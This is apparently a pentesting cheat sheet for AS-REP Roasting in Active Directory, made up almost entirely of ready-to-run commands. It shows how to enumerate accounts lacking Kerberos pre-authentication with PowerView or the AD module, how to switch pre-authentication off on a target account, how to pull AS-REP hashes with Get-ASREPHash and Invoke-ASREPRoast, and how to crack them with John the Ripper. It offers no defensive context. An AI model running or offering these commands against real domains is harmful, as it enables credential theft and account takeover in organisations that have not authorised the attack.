AS-REP Roasting

Enumerate

Enumerating accounts with Kerberos pre-authentication disabled

PowerView

Get-DomainUser -PreauthNotRequired -Verbose

AD Module

Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Disable pre-authentication

PowerView

Set-DomainObject -Identity <User> -XOR @{useraccountcontrol=4194304} -Verbose

Retrieve the hash

PowerView

Get-ASREPHash -UserName VPN1user -Verbose
Invoke-ASREPRoast -Verbose

Crack

john.exe --wordlist=passwords.txt asrephashes.txt